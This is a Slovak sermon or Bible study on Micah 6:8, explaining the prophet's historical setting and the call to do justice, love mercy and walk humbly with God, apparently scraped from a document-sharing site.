Micheas.doc

Veľkosť: px
Začať zobrazovať zo stránky:

Download "Micheas.doc"

Prepis

1 MICHEÁŚ Mich 6,8: Hospodin ti oznámil človeče, čo je dobré a čo žiada od teba; len zachovať právo, milovať láskavosť a v pokore chodiť so svojim Bohom. Prorok Micheáš bol súčasník proroka Izaiaša. Obidvaja pôsobili v Judskom kráľovstve medzi rokmi 740 až 700 pr. Kr. Prorokovali za čias kráľov Jotáma, Achaza a Ezechiaša. Jeho meno znamená Kto je ako Pán? Žil v časoch, kedy na Judsko i Izrael dorážali susedné vojská Sýrie a Asýrie ale aj medzi sebou mali severné kráľovstvo Izraela a južné kráľovstvo Judské nezhody a boje. Kráľ Achaz ( ), počas vlády, ktorého pokračoval duchovný úpadok južného Judského kráľovstva sa proti hrozbe vpádu spojených vojsk Sýrie a Izraeala spojil s vládcom Asýrie, Tiglad - Pileazárom III. Počas svojej vlády nechal postaviť pohanské oltáre v Jeruzaleme a viedol ľud k modloslužbe. Bol to dôsledok jeho spojenia s Asyrčanmi v čase krízy, keď mu hrozil vpád cudzích vojsk. Nepočúval Božích prorokov, ale hľadal pomoc u ľudí. Dnes by sme povedali, vo svete. Asyrčania u ktorých hľadal pomoc sa stali o niečo neskôr ich pánmi, ktorým museli odvádzať predpísané dávky svojho majetku a prijali i ich náboženstvo. Dokonca kráľ Achaz obetoval ich bohom i vlastného syna (2Kr 16,3-4). V takejto dobe a situácii žil prorok Micheáš. Vládnúca trieda sa o pomoc obrátila k iným ľuďom a tým odhalila svoju neveru v Boha. A tento nedostatok svojej viery chceli zakryť obeťami a formálnou službou Bohu. A preto sa prorok pýtal: Či má Hospodin záľubu v tisícoch baranov a v desať tisícoch potokov oleja? (6,7) Pán Boh odhalil hriech svojho ľudu a prostredníctvom proroka povedal: Nenávidíte dobro a milujete zlo. (3,2) Krvou budujete Sion a Jeruzalem bezprávím. (3,10)

2 Micheaš 2 A preto sa ich Pán Boh dojemne pýtal: Ľud môj, čo som ti urobil, čím som ťa zaťažil? Odpovedz mi! (6,3) A pretože na tieto slová nemá človek odpoveď, uvedomujúc si svoj vlastný hriech, preto odpovedá Hospodin za nich. Prostredníctvom proroka Micheáša pripomína dávne požiadavky Boha na človeka: Hospodin ti oznámil človeče, čo je dobré a čo žiada od teba; len zachovať právo, milovať láskavosť a v pokore chodiť so svojim Bohom. (Mich 6,8) To je to isté, čo platilo už aj v minulosti Deut 10,12-13: Izrael, čo žiada teraz od teba Hospodin, tvoj Boh? Len to, aby si sa bál Hospodina, svojho Boha, aby si chodil len po Jeho cestách, aby si Ho miloval, aby si slúžil Hospodinu, svojmu Bohu, celým srdcom a celou dušou. A je opäť to isté, čo hovorí Ježiš Kristus ako odpoveď na zákonníkovu otázku: Ktoré je najväčšie prikázanie v zákone? A Pán Ježiš Kristus odpovedá: Milovať budeš Pána, svojho Boha, celým svojim srdcom a celou svojou dušou i celou svojou mysľou. (Mat 22,36-37) Niektorí ľudia hovoria, že spôsob záchrany ľudí v starom zákone a v novom zákone je rozdielny a že sú rozdielne aj požiadavky Pána Boha na človeka. Hovoria, že pred príchodom Ježiša Krista boli ľudia vedení k poslušnosti a na jej základe boli zachránení. Ale po obeti Ježiša Krista sme zachránení Jeho milosťou a daná nám je Jeho spravodlivosť a teda to znamená, že naša poslušnosť nie je potrebná. V tomto sú zrnká pravdy, ale ako celok to pravda nie je. V dávnej minulosti i dnes, kedykoľvek v dejinách, sú ľudia zachraňovaní Božou milosťou a daná je im Kristova spravodlivosť, ale svoju vieru v Božiu milosť prejavujú láskou a poslušnosťou. Na Božiu ponuku predsa musí byť odpoveď. Nie hocijaká odpoveď, kladná odpoveď, ktorá sa prejavuje prijímaním Božích požiadaviek.

3 3 Micheáś Micheáš, Mojžiš i Ježiš Kristus, hovoria o tejto odpovedi. O tom, čo má človek robiť, aby bolo zjavné, že Bohu dôveruje, že nemá pochybnosti o Bohu, ktorý mu v každodennom živote dáva istotu a zbavuje ho strachu a teda i neposlušnosti. Aké sú teda Božie požiadavky? Akú odpoveď nášho srdca a mysle očakáva Pán Boh?...len zachovať právo, milovať láskavosť a v pokore chodiť so svojim Bohom. Skúsme popremýšľať čo to znamená. Zachovať právo (činiť súd, právo konať). Právo či súd hovoria o tom, čo je správne a čo nie. Čo je Božie a čo je Bohu cudzie. Každému človeku, s ktorým žijeme určitú dobu, niekedy dokonca i pri náhodnom stretnutí dávame rôznym spôsobom, niekedy aj slovne najavo, čo je podľa nás správne a čo nie. Čo je prijateľné a čo odmietame. Pokiaľ máme zotrvať v kontakte vyhradzujeme si, aby bolo rešpektované naše právo. Robíme to všetci, pretože je nám to prirodzené. Dokážeme síce všeličo tolerovať, ale aj to dokazuje, že máme svoje pravidlá, svoje súdy. Je to preto, že sme boli stvorení pre určité podmienky a tých sa dožadujeme. A tak sa bránime, keď nám je zima, bránime sa proti bolesti, odmietame hrubosť, drzosť, obviňovanie, slovom nespravodlivosť, neprávosť páchanú na sebe (nás). A preto máme svoje zákony osobné, rodinné, štátne atď., ktoré chránia naše záujmy a slobodu. Ilustrácia: Prvý obchod (SPD II. 266) Má Pán Boh nárok na to, aby sme rešpektovali Jeho právo na Jeho území a právo Jeho majetku? Čo to znamená zachovať Jeho právo? Úplný výpočet by bol veľmi dlhý. Ale On, aby sme si to lepšie uvedomili, to zhrnul do 10.-tich bodov. Znamená to rešpektovať

4 Micheaš 4 Jeho právo na Jeho Božstvo, na Jeho jedinečnosť, na úctu k Nemu, na úctu k Jeho dielu a na úctu k pravidlám, ktoré On stanovil. A v tých pravidlách sú zahrnuté i naše záujmy. Apoštol Pavol to vysvetľuje v liste Rim 13,8-10: Nikomu nič nedlhujte, len to, aby ste sa milovali. Lebo kto blížneho miluje, naplnil zákon. Veď prikázania: nescudzoložíš, nezabiješ, nepokradneš, [nevydáš krivé svedectvo], nepožiadaš, a ak je nejaké iné prikázanie, v tomto slove sú zhrnuté: Miluj blížneho ako seba samého. Láska blížnemu zle nerobí. Plnosťou zákona je teda láska. Milovať láskavosť (milovať milosrdenstvo, milovať zľutovanie). Bola by na svete potrebná láskavosť, milosrdenstvo, keby fungovalo právo na 100%? - Áno. Právo totiž napr. znamená, že niekoho koho stretneme pozdravíme. Láskavosť, či milosrdenstvo znamená, že sa pri tom na neho usmejeme a trebárs sa ho spýtame ako sa má. Strohé právo bez láskavosti je vlastne nezmysel, karikatúra. Rešpektujeme právo druhého hlavne vtedy, keď mu prajeme dobré, keď ho máme radi, a aj tým mu prejavujeme láskavosť, ale tá ide ešte ďalej. Rešpektovať právo z Božej strany pri páde človeka do hriechu znamenalo, že nás Pán mal nechať zahynúť. Tak hovoril zákon: Odmena za hriech je smrť. (R 6,23) Ale Pán Boh išiel ďalej. On, ktorý nikdy nezhrešil pozná nielen právo, ale aj milosrdenstvo. Milujem ťa večnou láskou, a preto ti ustavične činím milosť. (Jer 31,3) Ilustrácia: Spomínam...(SPD II. 186) V pokore chodiť so svojim Bohom (pokorne). Čo je to pokora? A čo znamená byť pokorným?

5 5 Micheáś Čítal som, že keď prekladatelia prekladali hebrejské termíny označujúce pokoru, tak mali veľký problém, pretože niečo také sa v západnom myslení vôbec neobjavovalo? Pokora u ľudí vzniká na základe poznania vlastného hriechu, nedokonalosti a prejavuje sa trpezlivosťou a seba zapieravou službou. Ten najpokornejší z hriešnych ľudí bol Mojžiš (Nu 12,3). Ako ho poznáme? Čo o ňom vieme? On v určitých kritických situáciách prosil Hospodina, aby pre hriech nevyhubil Izraelcov, ale aby radšej vzal jemu život. Bol ochotný obetovať sa pre iných a podriadiť sa Božej vôli. (PP 280) Ale pokorný bol aj Ježiš Kristus a ten predsa nikdy nezhrešil Fil 2,6-8. To nám ukazuje, že to, čo od nás vyžaduje Hospodin, tým sa vyznačuje aj On sám a osvojenie tejto črty bude mať večnú platnosť. Naučiť sa pokore, znamená pripraviť svoj charakter pre život v Božom kráľovstve. Pokorne chodiť s Bohom, znamená chodiť po Jeho cestách, podľa Jeho vôle. Znamená to pridať k právu a láskavosti neochvejné presvedčenie o správnosti Božej cesty. Doslova tak, ako ovca nepochybovať o tom, že ju pastier vedie správnym smerom. Božia cesta nie je cesta búriacich sa a odporujúcich kozlov, ale cesta pokorných ovečiek. Pokorných vedie Hospodin, pretože sú učenlivý a dajú sa poučiť. Úprimne túžia poznať Božiu vôľu a plniť ju... Boh nikoho nenúti, preto nemôže viesť tých, čo sú pre svoju pýchu nepoučiteľní a tvrdohlavo idú vlastnou cestou. (PP 284) Tri rady a požiadavky predkladá pred nás Pán prostredníctvom svojho proroka: Hospodin ti oznámil človeče, čo je dobré a čo žiada od teba; len zachovať právo, milovať láskavosť a v pokore chodiť so svojim Bohom.

6 Micheaš 6 A na záver celej knihy hovorí čo môže očakávať Boží ľud pokiaľ jeho viera sa bude prejavovať pokorou, láskou a poslušnosťou: Kto je Boh ako Ty, ktorý odpúšťa viny, ktorý prehliada priestupky zvyšku svojho dedičstva? Netrvá navždy pri svojom hneve, lebo rád udeľuje milosť. Zľutuje sa opäť nad nami, rozšliape naše viny a uvrhne do hlbín mora všetky naše hriechy. (Mich 7,18-19) Pokoru, lásku a poslušnosť potrebujeme na tejto zemi, aby sa nám lepšie žilo a odpustenie, ktoré sľubuje Pán potrebujeme preto, aby sme mohli vojsť do budúceho života. To všetko je darom od Boha. Ak sa nám niečo z toho nedostáva, tak je tu rada apoštola Jakuba: Ak sa niekomu z vás nedostáva múdrosti, nech si ju prosí od Boha, ktorý proste a ochotne dáva všetkým, a dostane sa mu jej. (Jak 1,5).

Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej s

Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej s Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej sviatosti Kňaz (3x): Ó, krv a voda, ktorá si vyšla z

Podrobnejšie

Microsoft Word - Document4

Microsoft Word - Document4 Hľadať poznanie o Nebeskom Otcovi a Jeho Synovi Ježišovi Kristovi Starší Robert D. Hales Kvórum dvanástich apoštolov Svetlo viery je vo vás a čaká, kým bude prebudené a zintenzívnené Duchom Božím. Moji

Podrobnejšie

Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to,

Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to, Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to, aby mohol byť prísne vedecký. Na to druhé nemám nijaký

Podrobnejšie

8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Zákl

8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Zákl 8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Základný text 4 Preto sú dary milosti rôzne, ale Duch je

Podrobnejšie

Pracovný list č

Pracovný list č Meno Priezvisko Pracovný list č. 11 Zmluva s Bohom farnosť Milý priateľ/ka! Tak sa pomaly blížime k záveru našej cesty. Mnohé sme za ten čas spoznali. A mnohé aj urobili. V Tvojom živote nastali zmeny:

Podrobnejšie

Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ak

Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ak Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ako sa vidíme a vnímame. S týmto obrazom budeme pracovať

Podrobnejšie

zvesti-apríl2015

zvesti-apríl2015 Bojnické zvesti ročník 41 Apríl Apríl 2015 2015 PRÍHOVOR PRIMÁTORA Vážení spoluobčania, v dnešnej uponáhľanej dobe si už ani neuvedomujeme, ako čas ubieha neúprosne rýchlo. Nestačíme vnímať ako sa nám

Podrobnejšie

BULLETIN Jún

BULLETIN Jún BULLETIN Jún HOSPODIN JE MÔJ PASTIER Žalmy sú úžasnou časťou Biblie. Sú to básne, piesne, chvály, modlitby, múdrosti a vyznania. Asi žiadna iná z biblických kníh neodpovedá na toľko otázok každodenného

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint STVORENIE SVETA (Gn 1, 1-27) Úvod do knihy Genezis gr. význam pôvod, vznik Opisuje začiatky Božieho stvoriteľského diela a dejín spásy. Opisuje počiatok stvorenia, počiatok ľudstva, počiatok soboty, manželstva,

Podrobnejšie

Microsoft Word - RTucitel2.SK.doc

Microsoft Word - RTucitel2.SK.doc 2. CHARAKTER KRESŤANA Nech som ako Joe 1 - PRÍPRAVA A. PRAMEŇ (BIBLICKÉ TEXTY) - Matúš 5,17: Nemyslite si, že som prišiel zrušiť zákon alebo prorokov; neprišiel som zrušiť, ale naplniť; - Ján 5,36-40:

Podrobnejšie

Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: prihlasovanie sa na

Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: prihlasovanie sa na Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: 1.7.2019 prihlasovanie sa na jednotlivé aktivity CSPR, predstavenie aktivít priestor

Podrobnejšie

Microsoft Word - lutost.doc

Microsoft Word - lutost.doc ĽÚTOSŤ Petrova a Judášova ľútosť Nie každý pocit viny je výrazom pravej ľútosti nad hriechmi a otvorením sa Božiemu milosrdenstvu. V Evanjeliu nachádzame dva druhy ľútosti: Judášovu a Petrovu ľútosť. Judáš

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint Biblická súťaž Bratislavskej arcidiecézy 1. Odpovedz na otázky Ježišov príchod do ktorého mesta sa spomína v 2. kapitole Evanjelia sv Marka? A/ Kafarnaum B/ Jeruzalem C/ Nazaret Farizeji vyčítali Ježišovi,

Podrobnejšie

Prípravka pre pôstny modlitebný týždeň 2013

Prípravka pre pôstny modlitebný  týždeň 2013 Prípravka pre pôstny modlitebný týždeň 2013 Kristus Baránok Boží učí nás vytrvalosti a vernosti 2Tim 3, 14 17; 4, 1 2 1. deň: Buď verný učeniu a presvedčeniu (v. 14) Byť verný dnes už nie je veľmi v móde.

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint KTO SPOZNÁVA BIBLIU SPOZNÁVA KRISTA. Biblia je súbor kníh, ktoré hovoria o zmluve, ktorú Boh uzavrel s Izraelom skrze Mojžiša a ktorú naplnil v Kristovi. Je to Bohom vnuknuté slovo. Nie diktát. Nespadla

Podrobnejšie

Vzorové riešenia úlohy 4.1 Bodovanie Úvod do TI 2010 Dôvod prečo veľa z Vás malo málo bodov bolo to, že ste sa nepokúsili svoje tvrdenia dokázať, prič

Vzorové riešenia úlohy 4.1 Bodovanie Úvod do TI 2010 Dôvod prečo veľa z Vás malo málo bodov bolo to, že ste sa nepokúsili svoje tvrdenia dokázať, prič Vzorové riešenia úlohy 4.1 Bodovanie Úvod do TI 2010 Dôvod prečo veľa z Vás malo málo bodov bolo to, že ste sa nepokúsili svoje tvrdenia dokázať, pričom to je veľmi dôležitá súčasť úlohy. Body sa udeľovali

Podrobnejšie

modlitebny_tyzden

modlitebny_tyzden Prorok Ozeáš (výber) Prvý z malých prorokov Ozeáš prorok, ktorý slúžil s prestávkou celých 70 rokov (podľa výpočtu kráľov u neho) v severnom, izraelskom národe /im patrí aj proroctvo; aj tam, kde hovorí

Podrobnejšie

10 tipov pre tvoj forex úspech

10 tipov pre tvoj forex úspech 5 konkrétnych spôsobov, ako zarobiť 1 milión EUR Redakcia Svet bohatých Ak má človek zdravé ruky a trocha rozumu, dá sa dosiahnuť čokoľvek. Po svete dnes behá viacero ľudí, ktorí vďaka kreativite a vytrvalosti

Podrobnejšie

Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, Bratislava IEA

Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, Bratislava IEA Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, 831 03 Bratislava IEA, 2011 Moderné vzdelávanie pre vedomostnú spoločnosť/

Podrobnejšie

Microsoft Word - bd7c-847f-df2b-6465

Microsoft Word - bd7c-847f-df2b-6465 Náboženská výchova 1. ročník Charakteristika vyučovacieho predmetu Keďže človek je z psychologického a sociologického hľadiska prirodzene bytosť náboženská, má potrebu smerovať k tomu, čo ho presahuje.

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint Biblická súťaž Bratislavskej arcidiecézy 1. Odpovedz na otázky Ježišov príchod do ktorého mesta sa spomína v 2. kapitole Evanjelia sv Marka? A/ Kafarnaum B/ Jeruzalem C/ Nazaret A; Mk 2, 1 Farizeji vyčítali

Podrobnejšie

Microsoft Word - Kniha2_Tema_1_Student.doc

Microsoft Word - Kniha2_Tema_1_Student.doc TÉMA 1: ROZSAH TEJTO OBLASTI OBJAVOVANIA Prehľad témy Predstavte si, aké by to bolo skvelé vyhrať cenu, ktorá by vám umožnila stráviť jeden celý týždeň spoznávaním ktoréhokoľvek človeka na svete. Len si

Podrobnejšie

Microsoft Word - 6 Výrazy a vzorce.doc

Microsoft Word - 6 Výrazy a vzorce.doc 6 téma: Výrazy a vzorce I Úlohy na úvod 1 1 Zistite definičný obor výrazu V = 4 Riešte sústavu 15 = 6a + b, = 4a c, 1 = 4a + b 16c Rozložte na súčin výrazy a) b 4 a 18, b) c 5cd 10c d +, c) 6 1 s + z 4

Podrobnejšie

ETV 6

ETV 6 Etická VI. ročník Tematický výchovno-vzdelávací plán bol vypracovaný podľa učebných osnov Štátneho vzdelávacieho programu a upravený podľa Školského vzdelávacieho programu Štvorlístok. Schválené PK dňa

Podrobnejšie

Pašie

Pašie V mene Pána Ježiša Krista, toho ukrižovaného! PAŠIE História utrpenia a smrti Pána a nášho Spasiteľa Ježiša Krista čítané na Kvetnú nedeľu a Veľký piatok s predpašiovou 5. pôstnou nedeľou 1996 Tranoscius,

Podrobnejšie

Október-_Rim_4_-_1_Kor_1.doc

Október-_Rim_4_-_1_Kor_1.doc Rozpis čítania NZ na Október 08 - Rok sv. Pavla Dát. deň Lectio divina Prečítať Dát. deň Lectio divina Prečítať 1. st Rim 4,13-25 Mk 14 17. pia 11, 25-36 Lk 14 2. št 5, 1-11 15 18. so 12, 1-8 15 3. pia

Podrobnejšie

SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť s

SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť s SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r 2 0 1 2 O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť sa ku svojej panej... 1Moj 16,8.9; Sú ľudia, ktorí si

Podrobnejšie

Microsoft Word - Čnosti.doc

Microsoft Word - Čnosti.doc Záver Čnosti vo všeobecnosti sú pre človeka veľmi dôležité. Čnostný človek má cestu do neba ľahšiu. Každá nadobudnutá, respektíve prehĺbená čnosť je akoby palicou, ktorou sa na tejto ceste podopiera. Podobne

Podrobnejšie

LEKCIE PRE DETI STARÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej

LEKCIE PRE DETI STARÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej LEKCIE PRE DETI STARÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej, SO Rok vydania: 2019 Jazyková korektúra: Mgr. et

Podrobnejšie

3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. M

3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. M 3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. Martinovi 2. Zamyslenie na deň 3. Litánie k sv. Martinovi

Podrobnejšie

1 Pastor Chris Nepozeraj na vonkajšie zdanie Lebo toto terajšie ľahké bremeno súženia získa nám nesmiernu hojnosť večnej slávy, keď nehľadíme na vidit

1 Pastor Chris Nepozeraj na vonkajšie zdanie Lebo toto terajšie ľahké bremeno súženia získa nám nesmiernu hojnosť večnej slávy, keď nehľadíme na vidit 1 Pastor Chris Nepozeraj na vonkajšie zdanie Lebo toto terajšie ľahké bremeno súženia získa nám nesmiernu hojnosť večnej slávy, keď nehľadíme na viditeľné, ale na neviditeľné. Viditeľné je totiž dočasné,

Podrobnejšie

12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájo

12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájo 12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájom hriechy a modlite sa jeden za druhého, aby ste boli

Podrobnejšie

A4_01_OBR_SK_HL_CZ_KCZ_KSK_DSK_HOT.qxd

A4_01_OBR_SK_HL_CZ_KCZ_KSK_DSK_HOT.qxd Oslepený KĽÚČE LEKCIA 1. úloha Čítaj Prečítaj si príbeh Oslepený. Nauč sa Začni sa učiť kľúčový verš. Premýšľaj Porozmýšľaj o tom, čo ti ide naozaj dobre; o dare, ktorým ťa Boh obdaroval. Modli sa Popros

Podrobnejšie

(07) Rekonštrukcia Mierového námestia kamenná dlažba alebo trávnik? sa na mestskom úrade v Trenčíne uskutočnilo stretnutie zástupcov volnéh

(07) Rekonštrukcia Mierového námestia kamenná dlažba alebo trávnik? sa na mestskom úrade v Trenčíne uskutočnilo stretnutie zástupcov volnéh (07) Rekonštrukcia Mierového námestia kamenná dlažba alebo trávnik? 10.09.2015 sa na mestskom úrade v Trenčíne uskutočnilo stretnutie zástupcov volného združenia Náš Trenčín s autormi víťazného návrhu

Podrobnejšie

Inovované učebné osnovy ETICKÁ VÝCHOVA ISCED2 Učebná osnova predmetu ETICKÁ VÝCHOVA v 5. ročníku základnej školy Výchovno-vzdelávacie ciele a obsah vz

Inovované učebné osnovy ETICKÁ VÝCHOVA ISCED2 Učebná osnova predmetu ETICKÁ VÝCHOVA v 5. ročníku základnej školy Výchovno-vzdelávacie ciele a obsah vz Učebná osnova predmetu ETICKÁ VÝCHOVA v 5. ročníku základnej školy Výchovno-vzdelávacie ciele a obsah vzdelávania : Sú v súlade s cieľmi a obsahovým a výkonovým štandardom vzdelávacieho štandardu pre vyučovací

Podrobnejšie

Súťaž Vráťme knihy do škôl je tu už po 8-krát! O súťaži Občianske združenie Učenie s úsmevom v spolupráci s partnermi internetové kníhkupectvo abcknih

Súťaž Vráťme knihy do škôl je tu už po 8-krát! O súťaži Občianske združenie Učenie s úsmevom v spolupráci s partnermi internetové kníhkupectvo abcknih Súťaž Vráťme knihy do škôl je tu už po 8-krát! O súťaži Občianske združenie Učenie s úsmevom v spolupráci s partnermi internetové kníhkupectvo abcknihy.sk Bratislavským samosprávnym krajom, vydavateľstvom

Podrobnejšie

Uloha trenera - V. Orszagh

Uloha trenera - V. Orszagh ÚLOHA TRÉNERA V DNEŠNOM HOKEJI Vladimír ORSZÁGH ÚLOHA TRÉNERA PLATÍ,ŽE KULTÚRU TÍMU ZOSOBŇUJE SÁM TRÉNER,MUSÍ BYŤ STELESNENÍM TOHO ČO POŽADUJE SÁM OD DRUHÝCH NA TRÉNINGU,NA ZÁPASE,VŠADE INDE. PLYNIE Z

Podrobnejšie

APOLÓGIA,

APOLÓGIA, APOLÓGIA, čiže OBRANA AUGSBURSKÉHO VIEROVYZNANIA Predhovor Filip Melanchton čitateľovi pozdravenie v Pánu. Keď sa Vierovyznanie našich kniežat verejne bolo prečítalo, niektorí teológovia a mnísi zostavili

Podrobnejšie

ALBATROS_MEDIA

ALBATROS_MEDIA I. Hovorí sa, že svet je dnes menší. A to preto, že sa veľmi rýchlo dostaneme hoci aj na druhý koniec sveta. Kedysi sme museli do Ameriky cestovať celé mesiace, a teraz tam preletíme za jeden deň. Podobne

Podrobnejšie

Novéna k Duchu Svätému II. Kráľovná novien, ktorú napísal sv. Alfonz Mária de Liguori Pozostáva z rozjímaní na každý deň novény od sviatku Nanebovystú

Novéna k Duchu Svätému II. Kráľovná novien, ktorú napísal sv. Alfonz Mária de Liguori Pozostáva z rozjímaní na každý deň novény od sviatku Nanebovystú Novéna k Duchu Svätému II. Kráľovná novien, ktorú napísal sv. Alfonz Mária de Liguori Pozostáva z rozjímaní na každý deň novény od sviatku Nanebovystúpenia Pána do Turíčnej vigílie. Novéna k Duchu Svätému

Podrobnejšie

Microsoft Word - UO iŠkVP primárne vzdelávanie NBV kat.

Microsoft Word - UO iŠkVP primárne vzdelávanie NBV kat. Názov predmetu Vzdelávacia oblasť Názov ŠkVP Škola Stupeň vzdelania Forma štúdia Dĺžka vzdelávania Vyučovací jazyk Náboženská výchova - katolícka Človek a hodnoty Inovovaný školský vzdelávací program Základná

Podrobnejšie

Všetci by sme mali byť feminist(k)ami (Ukážka)

Všetci by sme mali byť feminist(k)ami (Ukážka) Chimamanda Ngozi Adichie VŠETCI BY SME MALI BYŤ FEMINIST(K)AMI Preložila Kristína Karabová ÚVOD Toto je modifikovaná verzia prejavu, s ktorým som vystúpila v decembri 2012 na TEDxEus ton, každoročnej konferencii

Podrobnejšie

Microsoft Word - 03.doc

Microsoft Word - 03.doc RT3-07/1u-3 3. MLADÍ S POSLANÍM Maličkosti, maličkosti, maličkosti 1. PRÍPRAVA A. PRAMEŇ (VÝCHODZIE TEXTY) - 1.list Timotejovi 4, 11-12: SEP Toto prikazuj a uč. Nikto nech tebou nepohŕda pre tvoju mladosť.

Podrobnejšie

Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme

Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme spievať piesne a modliť sa. 1. Lurdská jaskyňa: TÚŽBY

Podrobnejšie

Metódy dokazovanie v matematike 1 Základné pojmy Matematika exaktná veda vybudovaná DEDUKTÍVNE ZÁKLADNÉ POJMY základy každej matematickej teórie sú in

Metódy dokazovanie v matematike 1 Základné pojmy Matematika exaktná veda vybudovaná DEDUKTÍVNE ZÁKLADNÉ POJMY základy každej matematickej teórie sú in Metódy dokazovanie v matematike 1 Základné pojmy Matematika exaktná veda vybudovaná DEDUKTÍVNE ZÁKLADNÉ POJMY základy každej matematickej teórie sú intuitívne jasné a názorné napr. prirodzené čísla, zlomok,

Podrobnejšie

Bulletin16-17.indd

Bulletin16-17.indd Život Cirkvi Ročník 17 16-17/2011 Z tvojho Vzkriesenia, Kriste, raduje sa nebo a zem KOMENTÁR Tiché Božie milosrdenstvo Nedeľa Božieho milosrdenstva sa nám už akosi automaticky spája s Krakovom a svätou

Podrobnejšie

Popolcová streda – 13

Popolcová streda – 13 ÚVAHY NA DNI VEĽKÉHO PÔSTU 2019 ŠTVRTÝ PÔSTNY TÝŽDEŇ = 8.4. 13.4. 2019 64 32 5 Niekoľko slov na úvod: Materiály, ktoré budú umiestňované na farskej webovej stránke v RUBRIKE NOVINKY, Vás pozývajú k tomu,

Podrobnejšie

